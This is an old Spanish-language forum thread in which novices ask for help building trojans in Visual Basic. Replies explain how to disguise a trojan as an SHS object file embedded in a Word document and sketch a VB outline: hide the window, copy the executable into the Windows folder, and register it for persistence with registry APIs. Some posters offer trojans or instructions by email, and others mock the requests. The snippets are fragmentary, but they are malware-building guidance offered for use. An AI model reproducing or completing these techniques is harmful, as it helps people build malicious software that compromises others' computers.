AYUDAME A HACER UN TROYANO

RUBEN
03 de Septiembre del 2004
HOLA, A TODOS ESTOY TRABAJANDO POR PRIMERA VEZ CON VISUAL BASIC Y AGRADECERIA A ALGUN MAESTRO HACKER QUE ME AYUDE A DISEÑAR TROYANOS.
ATTE EDUARDO

mosmonito
penoso

miguel
ayudame a iniciar un hacker para sms y hacer un troyano soy novato porfa seria agradable saber ese metodo que ud sabe porfa

Mr Cerebro
Buen ote recomeindo q utilizen para empezar un virus SHS, q son faciles de hacer yocultar, la gracia de stos archivos es q cuando los abren aparece codiog aloçgo asi #65564///=, asi q el chiste sta en abjuntar un archivo troyano como un objeto de World, luego ambiar la extension a SHS, preferible insertar un objeto Block de Notas con codigo script. luego cambiar la extension.

santiago
si tienes ya un troyano que tenga mata procesos me lo puedes enviar gracias.

Ponganse a hacer algo de probe
Para hacer un trayano, primero haces u caballo hueco, le metes un poco de soldados, luego lo envuesves para regalo, se l envias al rey del pueblo vecino y listo... ya tienes tu troyado... Babotas..

Umbra
Tengo un archivo .PDF con instrucciones para hacer un trojan horse sencillo. ¡FUNCIONA!
Enviame un e-mail a la direccion [email protected] pidiendomelo, no te lo envio yo, pues no se si todavia lo necesitas.

¶mmm
LO PRIMERO QUE TIENES QUE HACER ES OCULTAR TU TROYANO.
FrmTroyan.Visible=False
SEGUNDO QUE SE AUTOCOPIE.
FileCopy App.Path + "" + App.EXEName + ".exe", "%Windir%file.exe" 'ESTE LO PUEDES PONER EN TODAS LAS DIRECCIONES QUE QUIERAS.
TERCERO CARGARLO EN EL REGISTRO CON LAS API'S
* RegCreateKey
* RegSetValueEx 'no pongo el código por que es muy largo si quieres me escribes al correo [email protected]
CUARTO DE HAY PARA ALLA LE METES LAS FUNCIONES QUE TU QUIERAS ESCRIBEME Y HABLAMOS

¶mmm FUTURE MASTER
I'M NOT A HACKER THEY ARE MUCH BETTER THAN ME

tecniCam